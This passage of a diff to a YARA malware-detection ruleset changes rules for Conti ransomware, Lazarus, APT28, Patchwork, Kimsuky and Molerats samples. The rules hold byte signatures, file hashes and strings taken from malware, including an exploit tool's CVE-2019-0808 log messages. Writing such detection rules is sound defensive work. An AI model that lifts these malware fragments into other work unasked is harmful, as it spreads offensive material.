ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 } + $seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 } + $seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff } + $seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 } + + condition: + uint16(0)==0x5a4d and filesize >90KB and all of ($seq*) } rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE { @@ -199898,652 +201841,577 @@ rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE condition: uint16(0)==0x457f and filesize <15KB and (1 of ($lib*) and 4 of ($c*) and 2 of ($d*) and 4 of ($s*) and 3 of ($info*)) } -import "pe" - -rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE +rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Shellcode_Aug_2021_1 : FILE { meta: - description = "Detect CVE 2019-0808 tool used by Patchwork group" + description = "Detect Kimsuky shellcode used in fake PDF against South Korea" author = "Arkbird_SOLG" - id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684" - date = "2020-08-27" - modified = "2021-07-13" - reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34" + id = "0b8d514b-82b6-5106-a87a-0890be1850d5" + date = "2021-08-03" + modified = "2021-08-04" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Shellcode_Aug_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8" + logic_hash = "432ae4d1e61aec51be03edf7767b1f05ea98d7cb7af90372a70f8ae86002f82a" score = 50 quality = 75 tags = "FILE" - hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c" + hash1 = "7900ca98a6fbed74aa5a393758c43ad7abc9d8c73c3fbab7af93bae681065f4e" + hash2 = "359ab5e0b57da0307ca9472e5b225dcd0f9dc9bf2efd2f15b1ca45b78791b6bc" + hash3 = "5ea7a724d99fab3f05f50dccd57db59451334ac8640c532d426df319dad55c9e" level = "Experimental" + tlp = "white" + adversary = "Kimsuky" strings: - $asm1 = { 8b 3d 44 21 01 10 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 e4 7e 01 10 68 e8 7e 01 10 6a 00 ff d7 50 68 f0 7e 01 10 a3 c8 a2 01 10 e8 e8 f7 ff ff 8b 35 68 21 01 10 8d 84 24 5c 01 00 00 83 c4 08 c7 84 24 54 01 00 00 1c 00 00 00 0f 57 c0 c7 84 24 58 01 00 00 10 00 00 00 66 0f 13 84 24 60 01 00 00 66 0f 13 84 24 68 01 00 00 50 ff b4 24 1c 01 00 00 c7 84 24 64 01 00 00 00 00 00 60 ff d6 8d 84 24 54 01 00 00 50 ff 74 24 10 ff d6 8b 35 5c 21 01 10 68 04 7f 01 10 ff 74 24 10 68 10 04 00 00 ff b4 24 24 01 00 00 ff } - $asm2 = { a1 14 21 01 10 0f 57 c0 8b 74 24 08 89 84 24 28 01 00 00 8d 84 24 20 01 00 00 50 c7 84 24 28 01 00 00 00 00 00 00 66 0f 13 84 24 3c 01 00 00 c7 84 24 44 01 00 00 00 00 00 00 c7 84 24 50 01 00 00 00 00 00 00 c7 84 24 24 01 00 00 30 00 00 00 c7 84 24 30 01 00 00 00 00 00 00 c7 84 24 34 01 00 00 00 00 00 00 89 b4 24 38 01 00 00 c7 84 24 48 01 00 00 00 00 00 00 c7 84 24 4c 01 00 00 10 7f 01 10 ff 15 64 21 01 10 6a 00 56 6a 00 6a 00 6a 01 6a 01 6a 00 6a 00 68 00 00 00 08 68 20 7f 01 10 68 10 7f 01 10 6a 00 ff d7 6a 00 50 6a 00 6a 00 a3 ec a2 01 10 6a 00 ff b4 24 2c 01 00 00 ff 15 58 21 01 } - $asm3 = { e8 72 fb ff ff 83 c4 08 68 c0 13 00 10 6a fc ff 76 0c ff 15 54 21 01 10 56 ff 75 0c ff 75 08 6a 00 ff 15 24 21 01 10 5f 5e 5b 5d } - $s1 = "[*] Successfully exploited CVE-2019-0808 and triggered the shellcode!" fullword ascii - $s2 = "[!] Failed to find the address of IsMenu within user32.dll." fullword ascii - $s3 = "Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM." fullword ascii - $s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii - $s5 = "[*] Found target windows!" fullword ascii - $s6 = "[*] addressOfIsMenuFromStartOfUser32: 0x%08X" fullword ascii - $s7 = "[*] FakeMenu: %p" fullword ascii - $s8 = "[*] Primary window address: 0x%08X" fullword ascii - $s9 = "[!] Didn't exploit the program. For some reason our privileges were not appropriate." fullword ascii - $s10 = "[*] hUser32: 0x%08X" fullword ascii - $s11 = "[*] Secondary window address: 0x%08X" fullword ascii - $s12 = "[*] Offset: 0x%08X" fullword ascii - $s13 = "[*] pHmValidateHandle: 0x%08X" fullword ascii - $s14 = "[*] HWND: %p " fullword ascii - $s15 = "[*] pIsMenuFunction: 0x%08X" fullword ascii - $s16 = "[*] Destroyed spare windows!" fullword ascii - $s17 = "[!] SetWindowLongA malicious error: 0x%08X" fullword ascii + $x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d } + $s1 = { 48 89 d4 57 e9 6f 22 47 16 ff ec 91 e6 7f a8 20 65 0c 43 db 53 7d e1 b6 } + $s2 = { 48 5e 64 35 50 98 b6 9b 63 9b 86 c1 1b f9 7f df f7 ea ea aa a6 31 78 f2 65 77 8e a6 bb } + $s3 = { ef a7 2c 5e 96 b8 84 06 66 b8 9e 54 cb 51 80 f1 66 35 65 69 0a 38 c5 35 7e 62 48 a2 18 c4 2b 76 0f ba 00 07 6a 2e c5 e3 71 66 ac 6d 12 f6 95 99 0b 37 a3 6c d1 5f 64 b3 fb 0e a0 8d f5 d9 f3 24 61 e9 18 c9 d9 6a a5 94 48 d3 5f e2 19 93 5a fe 33 99 e7 91 50 f5 8e 6e 5b 1d 07 1e 21 3c 2e 3c 7c bb 55 9f ad 2e 3c 7c 1f 1f } + $s4 = { b1 9a 3c f7 ce 9e 51 79 f2 c4 d9 13 3a a9 ee f0 95 3d fa be 86 ad cd ea d1 90 d4 4e 18 3a 51 58 b4 e9 97 b7 48 e5 62 32 36 5b 6c d8 ae a4 d2 1d b6 92 a7 af 67 15 c5 52 96 44 02 51 58 1c c7 1c a5 2f c3 28 d0 cf 56 10 f1 27 fd 1f 7e b7 9e 30 b5 9c e0 60 02 37 9e 44 4c 62 30 cb 36 2a a6 c4 f3 7c f1 5b 9e 25 73 d5 d4 f4 f0 fd 8a 1d 89 e1 9d 31 4b 59 ce 0c 33 b6 ab 4d 3b 5f a7 69 21 a0 42 11 13 f3 70 9f 27 33 b6 58 e7 38 49 2d 97 18 de bf c3 c2 97 35 4c 65 70 61 6a d7 1c 3e 7e f2 04 7e d1 39 bc a3 ad 5b 1e 51 65 0d 70 a5 4a 55 b3 89 d9 71 c7 1b 77 4f 15 41 0e 0a 09 28 ab 0d 14 43 af 55 f4 6c } + $s5 = { 91 42 d1 ed c0 be 73 73 3e 35 8f b4 8e 38 f9 97 ba f9 58 d6 8b 37 a8 82 29 e7 4d 35 ea e2 ba 48 e0 61 b5 a4 f6 d4 4b 90 6a 98 89 fb 81 39 8b 3b 18 de dc 9d b7 36 ec d2 f1 51 56 1a 10 d3 b5 6b b4 95 f9 1e 86 97 9c 71 d5 4b 9a fb 0c 89 ec 3c d4 1d ac 51 34 9f 63 4d 51 59 3c b1 11 7a cd 79 a0 7a d6 43 48 52 d6 9a 4f bb 70 9a f6 3d a5 8d 72 37 9c 5b 66 e8 37 b5 48 25 80 74 e3 c7 46 ae 45 47 8e b4 e5 e8 3a 52 cd d3 87 c1 67 27 d7 62 54 6e 52 86 71 c5 c1 9f 2c ee 31 fa 2e c9 6a 7b a0 60 50 9f 16 17 f9 45 cd d9 b5 00 78 e4 6c 6b b5 f2 8e e1 bd 00 7d 74 c5 a5 45 35 0c dc 79 9c 3d 82 6a 86 92 } condition: - uint16(0)==0x5a4d and filesize >70KB and (pe.imphash()=="d4a5e8c255211639195793920eeda70f" and 2 of ($asm*) and 12 of ($s*)) + uint32(0)==0x46445025 and filesize >25KB and $x1 and 4 of ($s*) } -rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1 : FILE { meta: - description = "Detect Conti ransomware (v3)" + description = "Detect encoded Kimsuky shellcode used in fake PDF against South Korea" author = "Arkbird_SOLG" - id = "efa65b86-95d7-55fd-b98a-7b3c747a671c" - date = "2021-12-16" - modified = "2021-12-16" + id = "8df7090a-6583-5d25-92bd-422e6b4191f7" + date = "2021-08-03" + modified = "2021-08-04" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-04/Kimsuky/APT_Kimsuky_PDF_Enc_Shellcode_Aug_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70" - score = 75 + logic_hash = "54f549b92c232f789aff039c748f1f987e68e9ee10dfab309f2ecba16d574cdb" + score = 50 quality = 75 tags = "FILE" - hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b" - hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941" - hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1" + hash1 = "83292ba7a1ddda6acf32181c693aa85b9e433fcb908a94ebccbed0f407a1a021" + hash2 = "512ad244c58064dfe102f27c9ec8814f3e3720593fe1e3ed48a8cb385d52ff84" + level = "Experimental" tlp = "white" - adversary = "RAAS" + adversary = "Kimsuky" strings: - $s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 } - $s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff } - $s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 } + $x1 = { 52 2f 53 2f 4a 61 76 61 53 63 72 69 70 74 3e 3e 0d 65 6e 64 6f 62 6a 0d } + $s1 = { 78 9c ec bd 6b 97 eb 4a 72 25 f6 57 8e b5 96 67 75 4f 6b 24 f0 25 8f a6 d5 b3 16 59 00 6a c8 19 80 06 86 28 9b 65 d9 b3 7a 58 b7 59 97 3c ea 96 fb 21 92 90 fb bf 3b 76 64 c6 23 93 f5 38 47 6a 8f f5 41 1f ee ba c5 03 12 40 66 46 46 c6 63 c7 8e 7f f8 } + $s2 = { 94 fe 9b f1 c7 1f e8 e3 0f f4 f1 87 19 fd 37 ff f9 17 fc db 8f f4 ed e2 e7 5f fe 1b fe ff df 7e fc 8b df fe f0 f7 5f 7f 79 f8 e1 27 7f f9 7f fc 5f cb 7f f7 fc cb 7f 37 16 ff ee af ff f6 67 7f fb 97 7f fb b7 bf f8 3f ff f2 f8 e7 74 e3 9f fe fc cb e5 f5 c7 af 3f 7c f9 c9 8f 5f fe 06 3f f9 fa c3 af 8f bf 7f a5 87 d3 fd e9 26 bf 7f fd f1 } + $s3 = { b6 7c 2a db e2 39 ae 67 75 d9 ee 56 ab 7e 27 f2 b5 2e ba 61 3d a5 f5 88 f3 5b 3f f6 b4 b6 6d d1 c9 fb ae 9a 20 93 63 5c cf 69 73 6e a6 dd 4e d6 6b 98 f4 67 92 01 fa 9e 3d 6f 98 f7 95 3c ef eb aa 3f 37 85 bd ef 70 69 c6 ba ea 77 4f } + $s4 = { 4d 51 d7 5b 7d de f2 96 c8 0b dd bf d9 2d e9 7d 87 85 ec 87 b6 a4 cf 43 dc 1f 55 37 d2 fd 2b 95 df 20 6f 45 ab e3 e1 eb 24 df 71 ff 40 fe 69 3f } + $s5 = { 0f 35 fc 43 53 cf 03 67 d3 85 fb 51 b6 49 5f 40 fa 5d a2 3f 7d 31 fb 0b 3d 6f 53 69 ff 78 aa 37 e8 f3 12 fe 35 3e 43 90 7c 9c e3 73 a6 78 1c 9c 21 ec bf 20 df eb f0 5a b7 76 6f fb ad 96 53 57 0f a4 fc c3 6a f5 6d fe 41 fc 19 ed f7 4f 78 3a e9 1f f8 23 3d 2b 8d 2f 86 79 d6 7b b2 f8 e0 85 f2 51 25 fc 70 8c } condition: - uint16(0)==0x5A4D and filesize >100KB and all of ($s*) + uint32(0)==0x46445025 and filesize >25KB and $x1 and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE { meta: - description = "Detect PseudoManuscrypt loader dropped by the installer" + description = "Detect Molerats implants" author = "Arkbird_SOLG" - id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed" - date = "2021-12-16" - modified = "2021-12-17" - reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22" + id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba" + date = "2021-02-27" + modified = "2021-03-01" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23" license_url = "N/A" - logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830" + logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea" score = 75 quality = 75 tags = "FILE" - hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f" - hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e" - hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c" - hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727" - tlp = "white" - adversary = "-" - - strings: - $s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 } - $s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c } - $s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 } - $s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e } - $s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 } - - condition: - uint16(0)==0x5A4D and filesize >3KB and filesize <30KB and all of ($s*) -} -import "pe" - -rule ARKBIRD_SOLG_APT_NK_Lazarus_Implant_June_2020_1 : FILE -{ - meta: - description = "Detect Lazarus implant June 2020" - author = "Arkbird_SOLG" - id = "602c33f2-1e34-5267-9154-ada2d6edc64b" - date = "2020-06-28" - modified = "2020-06-28" - reference = "https://twitter.com/ccxsaber/status/1277064824434745345" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT_NK_Lazarus_Implant_June_2020_1.yar#L3-L23" - license_url = "N/A" - logic_hash = "29b6b8d3bdd47707854ed0dc00808d6352934950a8e7244450df78422ff3cb15" - score = 75 - quality = 73 - tags = "FILE" - hash1 = "21afaceee5fab15948a5a724222c948ad17cad181bf514a680267abcce186831" - - strings: - $s1 = "Upgrade.exe" fullword ascii - $s2 = "ver=%d×tamp=%lu" fullword ascii - $s3 = "_update.php" fullword ascii - $s4 = "Dorusio Wallet 2.1.0 (Check Update Windows)" fullword wide - $s5 = "Content-Type: application/x-www-form-urlencoded" fullword ascii - $s6 = "CONOUT$" fullword ascii - $s7 = "D$8fD;i" fullword ascii - $s8 = "WinHttpOpenRequest" fullword ascii - $s9 = "HTTP/1.0" fullword ascii - $s10 = "POST" fullword ascii - - condition: - uint16(0)==0x5a4d and filesize <30KB and (pe.imphash()=="565005404f00b7def4499142ade5e3dd" or 6 of them ) -} -import "pe" - -rule ARKBIRD_SOLG_APT28_Zekapab_June_2020_1 : FILE -{ - meta: - description = "Detect Delphi variant of Zekapab" - author = "Arkbird_SOLG" - id = "cf87e67f-2db9-537d-8800-8cd47b47c276" - date = "2020-06-28" - modified = "2020-06-28" - reference = "https://twitter.com/DrunkBinary/status/1276573779037163520" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-28/APT28_Zekapab_June_2020_1.yar#L3-L29" - license_url = "N/A" - logic_hash = "a02a78b8f60cf9d4441cc18b70fd00ec89253a5feafdc0eb392486b575bc61e2" - score = 75 - quality = 25 - tags = "FILE" - hash1 = "12879b9d8ae046ca2f2ebcc7b1948afc44e6e654b7f4746e7a5243267cfd7c46" + hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc" + hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48" strings: - $s1 = "54484520494E535452554354494F4E2041542030783763663538326164205245464552454E434544204D454D4F525920415420307830303030303030302E2054" ascii - $s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii - $s3 = "5C4164646974696F6E735C73616D636C69656E742E657865" ascii - $s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes" fullword ascii - $s5 = "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\" fullword ascii - $s6 = "Software\\Borland\\Delphi\\Locales" fullword ascii - $s7 = "SOFTWARE\\Borland\\Delphi\\RTL" fullword ascii - $s8 = "Software\\Borland\\Locales" fullword ascii - $s9 = "FastMM Borland Edition" fullword ascii - $s10 = "#7@Qhq\\1@NWgyxeH\\_bpdgc" fullword ascii - $s11 = "4150504C49434154494F4E204552524F52" ascii - $s12 = "436D442E457865202F6320" ascii - $s13 = "6572726F72" ascii - $s14 = "WndProcPtr" fullword ascii - $s15 = "Request.UserAgent" fullword ascii - $s16 = "ProxyPassword<" fullword ascii + $seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 